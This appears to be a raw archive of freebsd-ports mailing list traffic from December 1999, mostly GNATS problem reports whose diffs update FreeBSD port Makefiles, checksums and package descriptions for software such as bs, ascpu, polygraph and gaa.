@@ # New ports collection makefile for: bs -# Version required: 2.1 +# Version required: 2.2 # Date created: 11 May 1997 # Whom: Andrey Zakhvatov # # $FreeBSD: ports/games/bs/Makefile,v 1.2 1999/08/25 06:03:03 obrien Exp $ # -DISTNAME= bs-2.1 +DISTNAME= bs-2.2 CATEGORIES= games MASTER_SITES= ftp://locke.ccil.org/pub/esr/ diff -ru bs.old/files/md5 bs/files/md5 --- bs.old/files/md5 Sun Dec 19 16:29:04 1999 +++ bs/files/md5 Sun Dec 19 16:30:00 1999 @@ -1 +1 @@ -MD5 (bs-2.1.tar.gz) = 6ec710ae68358894309a351a274a6eb6 +MD5 (bs-2.2.tar.gz) = 72b6af5bfac40ce2d4a99002b6714e51 diff -ru bs.old/pkg/DESCR bs/pkg/DESCR --- bs.old/pkg/DESCR Sun Dec 19 16:29:04 1999 +++ bs/pkg/DESCR Sun Dec 19 16:31:54 1999 @@ -1,42 +1,2 @@ - Battleships solitaire game with a color point-and-shoot -interface in the style of blue and galaxis games. - - BS 2.0 - -Battleships is an intrinsically silly game, but I couldn't resist fixing this -sucker. It now has a purely visual interface (you place ships and call for -shots by moving the cursor around the board using the standard yuhjklbn keys). - -The default game now disallows placement of ships so that they touch. A new --c option is available to force the older behavior. - -I also removed the `seemiss' option (now always on) and `ask' (which is only -useful for cheating). And I ifdefed out the ditsy opening screen; if you want -it back, compile with -DPENGUIN. One strike against featureitis... - -The code now lints as clean as the broken SysV curses lint library will let it. - -Some #ifdefs in the code should result in the right things being done for -BSD or USG systems. They key off A_UNDERLINE. If you're using the Linux -ncurses library, tell the makefile. - -This was probably a waste of a day or so. But what the hack -- rewriting the -strategy robot as an FSM was fun, and maybe the interface will set a good -example for the next guy. - -<*** FLAME ON ***> - -People who write termcap games that require you to enter #@!!#$! coordinates -rather than doing the natural pick-and-place with cursor motions should be -stuffed in suits and condemned to write COBOL for the rest of their days... - -<*** FLAME OFF ***> - -O.K., I feel better now that I've got that off my chest... - -November 1993: I've added function key support, and ANSI/POSIXized the code. - - Eric S. Raymond - esr@snark.thyrsus.com - (WWW: http://www.ccil.org/~esr/home.html) +interface in the style of blue and galaxis games (for console). >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Dec 19 8:20: 5 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 51CA114D50 for ; Sun, 19 Dec 1999 08:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA58982; Sun, 19 Dec 1999 08:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from netserv1.chg.ru (netserv1.chg.ru [193.233.46.3]) by hub.freebsd.org (Postfix) with ESMTP id 03A1014C83 for ; Sun, 19 Dec 1999 08:19:31 -0800 (PST) (envelope-from dima@netserv1.chg.ru) Received: (from dima@localhost) by netserv1.chg.ru (8.9.3/8.9.3) id TAA20564; Sun, 19 Dec 1999 19:19:24 +0300 (MSK) Message-Id: <199912191619.TAA20564@netserv1.chg.ru> Date: Sun, 19 Dec 1999 19:19:24 +0300 (MSK) From: Dmitry Sivachenko Reply-To: dima@Chg.RU To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15568: Please update sysutils/ascpu to 1.8 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15568 >Category: ports >Synopsis: Please update sysutils/ascpu to 1.8 >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sun Dec 19 08:20:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Dmitry Sivachenko >Release: FreeBSD 3.2-RELEASE i386 >Organization: >Environment: >Description: Please update sysutils/ascpu to the current version. >How-To-Repeat: >Fix: diff -Nur ascpu.old/Makefile ascpu/Makefile --- ascpu.old/Makefile Sun Dec 19 19:15:37 1999 +++ ascpu/Makefile Sun Dec 19 19:19:51 1999 @@ -1,12 +1,12 @@ # New ports collection makefile for: ascpu -# Version required: 1.6 +# Version required: 1.8 # Date created: 18 February 1999 # Whom: Dima Sivachenko # # $FreeBSD: ports/sysutils/ascpu/Makefile,v 1.5 1999/08/31 01:59:30 peter Exp $ # -DISTNAME= ascpu-1.6 +DISTNAME= ascpu-1.8 CATEGORIES= sysutils afterstep MASTER_SITES= http://bewoner.dma.be/Albert/software/ \ http://www.tigr.net/afterstep/as-apps/download/ascpu/ \ diff -Nur ascpu.old/files/md5 ascpu/files/md5 --- ascpu.old/files/md5 Sun Dec 19 19:15:37 1999 +++ ascpu/files/md5 Sun Dec 19 19:16:15 1999 @@ -1 +1 @@ -MD5 (ascpu-1.6.tar.gz) = dbe6dfd9dd6e0d4fd023a4f1151befb2 +MD5 (ascpu-1.8.tar.gz) = ef03840019e210231ae5a24a5efe8c95 >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Dec 19 8:30: 6 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 8D43714DA5 for ; Sun, 19 Dec 1999 08:30:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA59554; Sun, 19 Dec 1999 08:30:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from netserv1.chg.ru (netserv1.chg.ru [193.233.46.3]) by hub.freebsd.org (Postfix) with ESMTP id 6017814CA3 for ; Sun, 19 Dec 1999 08:23:55 -0800 (PST) (envelope-from dima@netserv1.chg.ru) Received: (from dima@localhost) by netserv1.chg.ru (8.9.3/8.9.3) id TAA20710; Sun, 19 Dec 1999 19:23:49 +0300 (MSK) Message-Id: <199912191623.TAA20710@netserv1.chg.ru> Date: Sun, 19 Dec 1999 19:23:49 +0300 (MSK) From: Dmitry Sivachenko Reply-To: dima@Chg.RU To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15569: Small fix for net/xferstats Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15569 >Category: ports >Synopsis: Small fix for net/xferstats >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sun Dec 19 08:30:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Dmitry Sivachenko >Release: FreeBSD 3.2-RELEASE i386 >Organization: >Environment: >Description: It seems xferstats now has no web-page. Lets remove it from pkg/DESCR. >How-To-Repeat: >Fix: diff -Nur xferstats.old/pkg/DESCR xferstats/pkg/DESCR --- xferstats.old/pkg/DESCR Sun Dec 19 19:24:59 1999 +++ xferstats/pkg/DESCR Sun Dec 19 19:25:16 1999 @@ -1,7 +1,5 @@ Xferstats is a utility that parses wu-ftpd, ncftpd, and (special) apache xferlogs and gives various information and totals about the data transferred. -WWW: http://xferstats.off.net - --Dima dima@chg.ru >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Dec 19 8:40: 7 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 7700B14C91 for ; Sun, 19 Dec 1999 08:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA60233; Sun, 19 Dec 1999 08:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from netserv1.chg.ru (netserv1.chg.ru [193.233.46.3]) by hub.freebsd.org (Postfix) with ESMTP id 97A4714E5C for ; Sun, 19 Dec 1999 08:31:18 -0800 (PST) (envelope-from dima@netserv1.chg.ru) Received: (from dima@localhost) by netserv1.chg.ru (8.9.3/8.9.3) id TAA20866; Sun, 19 Dec 1999 19:31:13 +0300 (MSK) Message-Id: <199912191631.TAA20866@netserv1.chg.ru> Date: Sun, 19 Dec 1999 19:31:13 +0300 (MSK) From: Dmitry Sivachenko Reply-To: dima@Chg.RU To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15570: Please update net/p5-Net-RawIP Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15570 >Category: ports >Synopsis: Please update net/p5-Net-RawIP >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sun Dec 19 08:40:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Dmitry Sivachenko >Release: FreeBSD 3.2-RELEASE i386 >Organization: >Environment: >Description: Please update net/p5-Net-RawIP to the current version (0.09) >How-To-Repeat: >Fix: diff -Nur p5-Net-RawIP.old/Makefile p5-Net-RawIP/Makefile --- p5-Net-RawIP.old/Makefile Sun Dec 19 19:28:15 1999 +++ p5-Net-RawIP/Makefile Sun Dec 19 19:29:41 1999 @@ -1,13 +1,13 @@ # New ports collection makefile for: p5-Net-RawIP -# Version required: 0.06 +# Version required: 0.09 # Date created: 18 February 1999 # Whom: Dima Sivachenko # # $FreeBSD: ports/net/p5-Net-RawIP/Makefile,v 1.3 1999/08/30 14:23:38 peter Exp $ # -DISTNAME= Net-RawIP-0.06b -PKGNAME= p5-Net-RawIP-0.06b +DISTNAME= Net-RawIP-0.09 +PKGNAME= p5-Net-RawIP-0.09 CATEGORIES= net perl5 MASTER_SITES= ${MASTER_SITE_PERL_CPAN} \ http://quake.skif.net/RawIP/files/ \ diff -Nur p5-Net-RawIP.old/files/md5 p5-Net-RawIP/files/md5 --- p5-Net-RawIP.old/files/md5 Sun Dec 19 19:28:15 1999 +++ p5-Net-RawIP/files/md5 Sun Dec 19 19:29:58 1999 @@ -1 +1 @@ -MD5 (Net-RawIP-0.06b.tar.gz) = 69c21e876cb2dd828a2de7f4b8733b01 +MD5 (Net-RawIP-0.09.tar.gz) = 1d0717a93ff19bcc60d75fe872055ae6 >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Dec 19 10:40:27 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 675FE150F9; Sun, 19 Dec 1999 10:40:24 -0800 (PST) (envelope-from phantom@FreeBSD.org) Received: (from phantom@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA67016; Sun, 19 Dec 1999 10:40:24 -0800 (PST) (envelope-from phantom@FreeBSD.org) Date: Sun, 19 Dec 1999 10:40:24 -0800 (PST) From: Message-Id: <199912191840.KAA67016@freefall.freebsd.org> To: phantom@FreeBSD.org, freebsd-bugs@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: misc/15565: x11-toolkits/rep-gtk updated Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: x11-toolkits/rep-gtk updated Responsible-Changed-From-To: freebsd-bugs->freebsd-ports Responsible-Changed-By: phantom Responsible-Changed-When: Sun Dec 19 10:39:55 PST 1999 Responsible-Changed-Why: Misfiled PR To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Dec 19 12:59:21 1999 Delivered-To: freebsd-ports@freebsd.org Received: from ady.warpnet.ro (ady.warpnet.ro [194.102.224.1]) by hub.freebsd.org (Postfix) with ESMTP id 8B8F414DC3 for ; Sun, 19 Dec 1999 12:59:12 -0800 (PST) (envelope-from ady@warpnet.ro) Received: from localhost (ady@localhost) by ady.warpnet.ro (8.9.3/8.9.3) with ESMTP id XAA30487; Sun, 19 Dec 1999 23:01:12 +0200 (EET) (envelope-from ady@warpnet.ro) Date: Sun, 19 Dec 1999 23:01:11 +0200 (EET) From: Adrian Penisoara To: Steve Price Cc: Akinori MUSHA aka knu , freebsd-ports@freebsd.org Subject: Re: ports/14359: Update port: mail/imap-uw In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, On Sun, 12 Dec 1999, Steve Price wrote: > This patch doesn't apply cleanly to the current port. Can you > send me (no need to send it to the list) a uuencoded diff against > what we currently have in the ports tree? Thanks. > > -steve > Just to let you know I have taken Akinori's patches and worked on a skeleton for imap-uw-4.7. Tomorrow I'll integrate the latest locking patch and check out the mlock locking example found in imapd-utils... I hope this comes just in time with the CVS ports tree unfreeze. I'll come back later with news, Ady (@warpnet.ro) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Dec 19 13:10:12 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 539DF14BC8 for ; Sun, 19 Dec 1999 13:10:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA76528; Sun, 19 Dec 1999 13:10:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from netserv1.chg.ru (netserv1.chg.ru [193.233.46.3]) by hub.freebsd.org (Postfix) with ESMTP id 409A314FBA for ; Sun, 19 Dec 1999 13:05:22 -0800 (PST) (envelope-from dima@netserv1.chg.ru) Received: (from dima@localhost) by netserv1.chg.ru (8.9.3/8.9.3) id AAA21572; Mon, 20 Dec 1999 00:05:15 +0300 (MSK) Message-Id: <199912192105.AAA21572@netserv1.chg.ru> Date: Mon, 20 Dec 1999 00:05:15 +0300 (MSK) From: Dmitry Sivachenko Reply-To: dima@Chg.RU To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15572: Update benchmars/polygraph to the current version Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15572 >Category: ports >Synopsis: Update benchmars/polygraph to the current version >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sun Dec 19 13:10:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Dmitry Sivachenko >Release: FreeBSD 3.2-RElease i386 >Organization: >Environment: >Description: Update benchmarks/polygraph to 2.2.7. patch-a{a,b} now obsolete due to using of GNU configure; patch-a{c,d} seems to be in the source tree. >How-To-Repeat: >Fix: diff -Nur polygraph.old/Makefile polygraph/Makefile --- polygraph.old/Makefile Sun Dec 19 19:35:59 1999 +++ polygraph/Makefile Sun Dec 19 22:55:56 1999 @@ -1,42 +1,43 @@ # New ports collection makefile for: polygraph -# Version required: 1.2.0 +# Version required: 2.2.7 # Date created: 3 March 1999 # Whom: Dima Sivachenko # # $FreeBSD: ports/benchmarks/polygraph/Makefile,v 1.4 1999/08/25 04:45:47 obrien Exp $ # -DISTNAME= polygraph-1.2.0-src -PKGNAME= polygraph-1.2.0 +DISTNAME= polygraph-2.2.7-src +PKGNAME= polygraph-2.2.7 CATEGORIES= benchmarks www MASTER_SITES= http://polygraph.ircache.net/sources/ \ http://www.chg.ru/~dima/ MAINTAINER= dima@Chg.RU -WRKSRC= ${WRKDIR}/polygraph/src +WRKSRC= ${WRKDIR}/polygraph + +GNU_CONFIGURE= YES post-patch: - @ ${MV} ${WRKSRC}/exprep.pl ${WRKSRC}/exprep.pl.pre_sed - @ ${SED} -e 's#/usr/local/bin/perl#${PERL5}#' \ - ${WRKSRC}/exprep.pl.pre_sed > ${WRKSRC}/exprep.pl - @ ${MV} ${WRKSRC}/../tools/BB/bb.pl ${WRKSRC}/../tools/BB/bb.pl.pre_sed1 - @ ${SED} -e 's#/usr/local/bin/perl#${PERL5}#' \ - ${WRKSRC}/../tools/BB/bb.pl.pre_sed1> ${WRKSRC}/../tools/BB/bb.pl.pre_sed - @ ${SED} -e 's#/usr/people/bakeoff/BB#${PREFIX}/lib/perl5/site_perl/${PERL_VER}/${PERL_ARCH}/polygraph#' \ - ${WRKSRC}/../tools/BB/bb.pl.pre_sed> ${WRKSRC}/../tools/BB/bb.pl + @ ${MV} ${WRKSRC}/src/exprep.pl ${WRKSRC}/src/exprep.pl.pre_sed + @ ${SED} -e 's#/usr/bin/perl#${PERL5}#' \ + ${WRKSRC}/src/exprep.pl.pre_sed > ${WRKSRC}/src/exprep.pl + @ ${MV} ${WRKSRC}/tools/BB/bb.pl ${WRKSRC}/tools/BB/bb.pl.pre_sed + @ ${SED} -e 's#/usr/bin/perl#${PERL5}#' \ + -e 's#/usr/people/bakeoff/BB#${PREFIX}/lib/perl5/site_perl/${PERL_VER}/${PERL_ARCH}/polygraph#' \ + ${WRKSRC}/tools/BB/bb.pl.pre_sed> ${WRKSRC}/tools/BB/bb.pl do-install: - @ ${INSTALL_PROGRAM} ${WRKSRC}/polyclt ${PREFIX}/bin - @ ${INSTALL_PROGRAM} ${WRKSRC}/polysrv ${PREFIX}/bin - @ ${INSTALL_PROGRAM} ${WRKSRC}/lr ${PREFIX}/bin - @ ${INSTALL_PROGRAM} ${WRKSRC}/lx ${PREFIX}/bin - @ ${INSTALL_SCRIPT} ${WRKSRC}/exprep.pl ${PREFIX}/bin/exprep - @ ${INSTALL_SCRIPT} ${WRKSRC}/../tools/BB/bb.pl ${PREFIX}/bin +.for file in polyclt polysrv lr lx distr_test pop_test rng_test aka piper polymon + @ ${INSTALL_PROGRAM} ${WRKSRC}/src/$(file) ${PREFIX}/bin +.endfor + @ ${INSTALL_PROGRAM} ${WRKSRC}/src/udp2tcpd ${PREFIX}/sbin + @ ${INSTALL_SCRIPT} ${WRKSRC}/src/exprep.pl ${PREFIX}/bin/exprep + @ ${INSTALL_SCRIPT} ${WRKSRC}/tools/BB/bb.pl ${PREFIX}/bin @ ${MKDIR} ${PREFIX}/lib/perl5/site_perl/${PERL_VER}/${PERL_ARCH}/polygraph .for file in Blob.pm Executer.pm Tools.pm Command.pm Logger.pm - @ ${INSTALL_SCRIPT} ${WRKSRC}/../tools/BB/$(file) \ + @ ${INSTALL_SCRIPT} ${WRKSRC}/tools/BB/$(file) \ ${PREFIX}/lib/perl5/site_perl/${PERL_VER}/${PERL_ARCH}/polygraph .endfor diff -Nur polygraph.old/files/md5 polygraph/files/md5 --- polygraph.old/files/md5 Sun Dec 19 19:35:58 1999 +++ polygraph/files/md5 Sun Dec 19 19:36:36 1999 @@ -1 +1 @@ -MD5 (polygraph-1.2.0-src.tar.gz) = 093634d5ba9d73d8db9047ea35e7f02c +MD5 (polygraph-2.2.7-src.tar.gz) = 3c7451c35ccff4ef67ab2896030870e4 diff -Nur polygraph.old/patches/patch-aa polygraph/patches/patch-aa --- polygraph.old/patches/patch-aa Sun Dec 19 19:35:59 1999 +++ polygraph/patches/patch-aa Thu Jan 1 03:00:00 1970 @@ -1,12 +0,0 @@ ---- Makefile.old Tue Apr 13 15:41:09 1999 -+++ Makefile Tue Apr 13 15:42:04 1999 -@@ -10,7 +10,8 @@ - - DEFINES = - --CFLAGS = -Wall -Wwrite-strings -Woverloaded-virtual -g -O3 $(INCLUDE) $(DEFINES) -+CFLAGS ?= -g -O3 -+CFLAGS += -Wall -Wwrite-strings -Woverloaded-virtual $(INCLUDE) $(DEFINES) - CXXFLAGS = $(CFLAGS) - CCFLAGS = $(CFLAGS) - diff -Nur polygraph.old/patches/patch-ab polygraph/patches/patch-ab --- polygraph.old/patches/patch-ab Sun Dec 19 19:35:59 1999 +++ polygraph/patches/patch-ab Thu Jan 1 03:00:00 1970 @@ -1,12 +0,0 @@ ---- xstd/Makefile.old Tue Apr 13 15:43:57 1999 -+++ xstd/Makefile Tue Apr 13 15:44:30 1999 -@@ -9,7 +9,8 @@ - - DEFINES = - --CFLAGS = -Wall -Wwrite-strings -Woverloaded-virtual -g -O3 $(INCLUDE) $(DEFINES) -+CFLAGS ?= -g -O3 -+CFLAGS += -Wall -Wwrite-strings -Woverloaded-virtual $(INCLUDE) $(DEFINES) - CXXFLAGS = $(CFLAGS) - CCFLAGS = $(CFLAGS) - diff -Nur polygraph.old/patches/patch-ac polygraph/patches/patch-ac --- polygraph.old/patches/patch-ac Sun Dec 19 19:35:59 1999 +++ polygraph/patches/patch-ac Thu Jan 1 03:00:00 1970 @@ -1,20 +0,0 @@ ---- Connection.cc.orig Sat May 1 16:26:02 1999 -+++ Connection.cc Sat May 1 16:26:53 1999 -@@ -148,7 +148,7 @@ - // XXX: make first IO check optional - const Size sz = - (theRd.theIOCnt++ + theWr.theIOCnt) || !theSock.errNo() ? -- theSock.read(theRdBuf.space(), theRdBuf.spaceSize()) : -1; -+ theSock.read(theRdBuf.space(), theRdBuf.spaceSize()) : (Size)-1; - - //cerr << here << "read " << sz << " : {" << theRdBuf.space() << "}" << endl; - -@@ -178,7 +178,7 @@ - // XXX: make this check optional! - const Size sz = - (theRd.theIOCnt + theWr.theIOCnt++) || !theSock.errNo() ? -- theSock.write(theWrBuf.content(), theWrBuf.contSize()) : -1; -+ theSock.write(theWrBuf.content(), theWrBuf.contSize()) : (Size)-1; - - //cerr << here << "wrote " << sz << " : {" << theWrBuf.content() << "}" << endl; - diff -Nur polygraph.old/patches/patch-ad polygraph/patches/patch-ad --- polygraph.old/patches/patch-ad Sun Dec 19 19:35:59 1999 +++ polygraph/patches/patch-ad Thu Jan 1 03:00:00 1970 @@ -1,11 +0,0 @@ ---- HttpDate.cc.orig Sat May 22 12:14:41 1999 -+++ HttpDate.cc Sat May 22 12:14:54 1999 -@@ -200,7 +200,7 @@ - } - - ostream &HttpDatePrint(ostream &os, Time date) { -- if (struct tm *t = gmtime(&date.tv_sec)) { -+ if (struct tm *t = gmtime((const time_t *)&date.tv_sec)) { - const char fill = os.fill('0'); - return os - << TheWeekDays[t->tm_wday] << ", " diff -Nur polygraph.old/pkg/PLIST polygraph/pkg/PLIST --- polygraph.old/pkg/PLIST Sun Dec 19 19:35:59 1999 +++ polygraph/pkg/PLIST Sun Dec 19 22:55:40 1999 @@ -2,6 +2,13 @@ bin/polysrv bin/lr bin/lx +bin/distr_test +bin/pop_test +bin/rng_test +bin/aka +bin/piper +bin/polymon +sbin/udp2tcpd bin/exprep bin/bb.pl lib/perl5/site_perl/%%PERL_VER%%/%%PERL_ARCH%%/polygraph/Blob.pm >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Dec 19 13:30: 6 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 4747615105 for ; Sun, 19 Dec 1999 13:30:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA77764; Sun, 19 Dec 1999 13:30:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from netserv1.chg.ru (netserv1.chg.ru [193.233.46.3]) by hub.freebsd.org (Postfix) with ESMTP id 7506B14CA4 for ; Sun, 19 Dec 1999 13:23:57 -0800 (PST) (envelope-from dima@netserv1.chg.ru) Received: (from dima@localhost) by netserv1.chg.ru (8.9.3/8.9.3) id AAA21737; Mon, 20 Dec 1999 00:23:50 +0300 (MSK) Message-Id: <199912192123.AAA21737@netserv1.chg.ru> Date: Mon, 20 Dec 1999 00:23:50 +0300 (MSK) From: Dmitry Sivachenko Reply-To: dima@Chg.RU To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15573: Fix for devel/gaa distfiles Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15573 >Category: ports >Synopsis: Fix for devel/gaa distfiles >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sun Dec 19 13:30:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Dmitry Sivachenko >Release: FreeBSD 3.2-RELEASE i386 >Organization: >Environment: >Description: It seems that mastersite for devel/gaa has gone. Please update the Makefile, tarball is now available only at my server. >How-To-Repeat: >Fix: diff -Nur gaa.old/Makefile gaa/Makefile --- gaa.old/Makefile Mon Dec 20 00:24:11 1999 +++ gaa/Makefile Mon Dec 20 00:24:34 1999 @@ -8,7 +8,7 @@ DISTNAME= gaa-1.5 CATEGORIES= devel -MASTER_SITES= http://gaa.netpedia.net/ +MASTER_SITES= ftp://ftp.gpad.ac.ru/pub/FreeBSD/distfiles/ EXTRACT_SUFX= .tgz MAINTAINER= dima@chg.ru diff -Nur gaa.old/pkg/DESCR gaa/pkg/DESCR --- gaa.old/pkg/DESCR Mon Dec 20 00:24:11 1999 +++ gaa/pkg/DESCR Mon Dec 20 00:24:41 1999 @@ -3,7 +3,5 @@ language generates C-code which analyses the arguments and creates your program's help. -WWW: http://gaa.netpedia.net/ - --Dima dima@chg.ru >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Dec 19 13:30: 7 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id D1B5415128 for ; Sun, 19 Dec 1999 13:30:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA77773; Sun, 19 Dec 1999 13:30:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from netserv1.chg.ru (netserv1.chg.ru [193.233.46.3]) by hub.freebsd.org (Postfix) with ESMTP id 619E915105 for ; Sun, 19 Dec 1999 13:28:20 -0800 (PST) (envelope-from dima@netserv1.chg.ru) Received: (from dima@localhost) by netserv1.chg.ru (8.9.3/8.9.3) id AAA21858; Mon, 20 Dec 1999 00:28:13 +0300 (MSK) Message-Id: <199912192128.AAA21858@netserv1.chg.ru> Date: Mon, 20 Dec 1999 00:28:13 +0300 (MSK) From: Dmitry Sivachenko Reply-To: dima@Chg.RU To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15574: Fix for net/ggsd mastersites Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15574 >Category: ports >Synopsis: Fix for net/ggsd mastersites >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sun Dec 19 13:30:02 PST 1999 >Closed-Date: >Last-Modified: >Originator: Dmitry Sivachenko >Release: FreeBSD 3.2-RELEASE i386 >Organization: >Environment: >Description: Unfortunately, primary site of net/ggsd has gone... Update the port to fix this. >How-To-Repeat: >Fix: diff -Nur ggsd.old/Makefile ggsd/Makefile --- ggsd.old/Makefile Mon Dec 20 00:28:21 1999 +++ ggsd/Makefile Mon Dec 20 00:28:45 1999 @@ -9,8 +9,7 @@ DISTNAME= ggsd PKGNAME= ggsd-0.1 CATEGORIES= net -MASTER_SITES= http://devplanet.fastethernet.net/ \ - http://www.FreeBSD.org/~billf/distfiles/ \ +MASTER_SITES= http://www.FreeBSD.org/~billf/distfiles/ \ ftp://ftp.gpad.ac.ru/pub/FreeBSD/distfiles/ EXTRACT_SUFX= .tar diff -Nur ggsd.old/pkg/DESCR ggsd/pkg/DESCR --- ggsd.old/pkg/DESCR Mon Dec 20 00:28:21 1999 +++ ggsd/pkg/DESCR Mon Dec 20 00:29:57 1999 @@ -1,7 +1,5 @@ GGSD is a Generic Graphical Server Daemon. It allows anyone to make a simple script and then start a network server to run it. -WWW: http://devplanet.fastethernet.net/files.html - --Dima dima@chg.ru >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Dec 19 15:30: 7 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id BD82A1523B for ; Sun, 19 Dec 1999 15:30:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA88778; Sun, 19 Dec 1999 15:30:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from totem.fix.no (totem.freenix.no [195.0.166.42]) by hub.freebsd.org (Postfix) with ESMTP id C85331524A for ; Sun, 19 Dec 1999 15:20:11 -0800 (PST) (envelope-from anders@totem.fix.no) Received: by totem.fix.no (Postfix, from userid 1000) id 3E7A6575D; Mon, 20 Dec 1999 00:20:10 +0100 